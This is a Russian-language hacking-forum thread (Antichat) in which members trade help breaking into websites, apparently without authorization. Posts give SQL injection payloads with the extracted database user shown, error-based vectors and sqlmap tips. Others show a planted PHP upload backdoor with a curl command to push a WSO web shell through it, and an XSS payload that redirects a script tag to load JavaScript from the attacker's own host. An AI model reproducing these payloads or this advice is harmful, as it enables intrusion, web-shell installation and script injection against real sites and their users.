Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Br@!ns, еще добавлю, что нынче модно использовать короткие запросы. Вот еще для изучения пару векторов с выводом через error-based (VolgaCTF::MySQL Game):

     
    2 people like this.
  2. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз

    залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
     
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    нет...
     
  4. int

    int Member

    Joined:
    18 May 2011
    Messages:
    81
    Likes Received:
    10
    Reputations:
    6
    Инъекция в INSERT. Вывод ошибок есть. Пытаюсь использовать error based вектор, но таблицы в которую происходит INSERT на сервере нету.
    Можно ли такое раскрутить?
     
  5. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    База на другом сервере ----> ничего не получится.
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,458
    Likes Received:
    777
    Reputations:
    834
    Посмотрите где расположена БД.


    Если есть данные от админки, то вполне получится.
     
    _________________________
  7. int

    int Member

    Joined:
    18 May 2011
    Messages:
    81
    Likes Received:
    10
    Reputations:
    6
    Как это сделать? В сообщение об ошибке SQL данной информации нет.
    Code:
    Table 'db_name.table_name' doesn't exist SQL=INSERT INTO table_name ( id, info ) VALUES ( 1, 'data' and updatexml(1,concat(0x3a,version(),2) or '')
    
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,458
    Likes Received:
    777
    Reputations:
    834
    user() - если выпадет IP сравни его с IP сайта, в ином случае БД на серваке с сайтом.
     
    _________________________
  9. int

    int Member

    Joined:
    18 May 2011
    Messages:
    81
    Likes Received:
    10
    Reputations:
    6
    Так user() не будет выполнен, т.к. mysql сервер сначала проверяет существование таблицы, в которую происходит вставка.
    Code:
    insert into non_existing_table(id, info) values(1,(select user()))
    // #1146 - Table 'data_base.non_existing_table' doesn't exist
    
    Может быть я не корректно задал вопрос. Уточню, что скорее всего таблица просто удалена, а не находится на другом сервере, но при этом есть уязвимый скрипт, который пытается обратиться к ней.
     
    #23569 int, 27 Sep 2014
    Last edited: 27 Sep 2014
  10. Сбербанк

    Сбербанк New Member

    Joined:
    30 Sep 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Подскажите, в данном случае:
    Code:
    /about/news/1'/
    Возможно ли раскрутить SQL и добиться вывода инфы? Любым способом, error-based, blind, time-based и так далее.
    Все векторы перепробовал, никак не получается.
     
    #23570 Сбербанк, 28 Sep 2014
    Last edited: 28 Sep 2014
  11. Сбербанк

    Сбербанк New Member

    Joined:
    30 Sep 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    А если version() заменить на user() или database(), то какой результат получим?
    Интересует рабочий запрос, а работоспособность вектора с name_const определяется как раз по user(), или любого произвольного значения а не в выводе версии.
    Хотя, если ты осилил раскрутку через name_const то покажи как что то кроме версии вытащить.
     
    #23571 Сбербанк, 28 Sep 2014
    Last edited: 28 Sep 2014
  12. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?
    Code:
    /about/news/1123123')union(select(1),2,3,4,5,6,user(),8,database(),10)#/
    :User: u74960@10.8.1.153
    Database: u74960
     
    1 person likes this.
  13. Сбербанк

    Сбербанк New Member

    Joined:
    30 Sep 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Спасибо большое! Не додумался до посылки сырых запросов. Выручил.
     
  14. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    95
    Likes Received:
    16
    Reputations:
    0
    как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю
    Mysql = 4.1
    пробовал добавлять --technique=B , --technique=T
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,789
    Likes Received:
    820
    Reputations:
    856
    в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.

    Вывод - не заставишь. Для ветки 4.* такой технологии нет.
     
    _________________________
  16. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    95
    Likes Received:
    16
    Reputations:
    0
    Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.
    ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    поэтому и предлагает перебирать по словарю. information_schema там нет. бинарный поиск посимвольно работает только если есть что искать :)
     
    _________________________
    1 person likes this.
  18. TIGERSSS

    TIGERSSS Banned

    Joined:
    25 Jan 2012
    Messages:
    16
    Likes Received:
    5
    Reputations:
    5
    На сайт загружен php файл с таким содержимым:
    PHP:
    <?
      if (
    $_FILES['F1l3']) {
        
    move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);
        echo 
    'OK';
      } else {
        echo 
    'You are forbidden!';
      }
    ?>
    Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста.
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Грабитель, Для MySQL 4 в настоящее время нет вектора атак, позволяющего получить списки таблиц (в select запросе) подобно чтению information_schema в MySQL 5. Единственный метод - брут таблиц по словарю, исключая редкие нюансы, например такие как:
    • Возможность доступа к ФС
    • Наличие таблицы с отладочной информацией
    • Возможность исполнения нескольких запросов за один раз (при использовании mysqli::multi_query, etc)
    • etc

    PHP:
    curl -"F1l3=@/home/user/shell/wso2.php" -"Name=/var/www/wso2.php" http://site.com/file.php
     
    #23579 randman, 8 Oct 2014
    Last edited: 8 Oct 2014
  20. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    65
    Likes Received:
    7
    Reputations:
    3
    Добрый день.

    Имеется сайт с XSS: http://site.com/?name=XSS_TEXT
    Html код этой страницы такой:
    Code:
    <html>
    <head>
      <script src="http://site.com/javascript-file.js?param=[COLOR=DarkOrange]XSS_TEXT[/COLOR]"></script>
    </head>
    <body>
    ...
    </body>
    <html>
    
    В свою очередь http://site.com/javascript-file.js?param=XSS_TEXT отдает вот что:
    Code:
    var  sss = {
      "param1" : 1,
      "param2" : {
        "param3" : 3,
        "param4" : "[COLOR=DarkOrange]XSS_TEXT[/COLOR]"
       }
    };
    
    Проблема в том что режется ' , ( , ) , scripts .
    Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что:
    http://site.com/javascript-file.js?param="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":"
    Code:
    var  sss = {
      "param1" : 1,
      "param2" : {
        "param3" : 3,
        "param4" : ""}};
    [COLOR=DarkOrange]document.head.childNodes[1].src="http://mysite.com/global.js";[/COLOR]
    var b={"1":{"1":""
       }
    };
    
    Fосле выполнения моего кода http://site.com/?name="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким:
    Code:
    <html>
    <head>
      <script src="http://mysite.com/global.js"></script>
    </head>
    <body>
    ...
    </body>
    <html>
    

    src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js)

    Спасибо :)
     
Loading...
Thread Status:
Not open for further replies.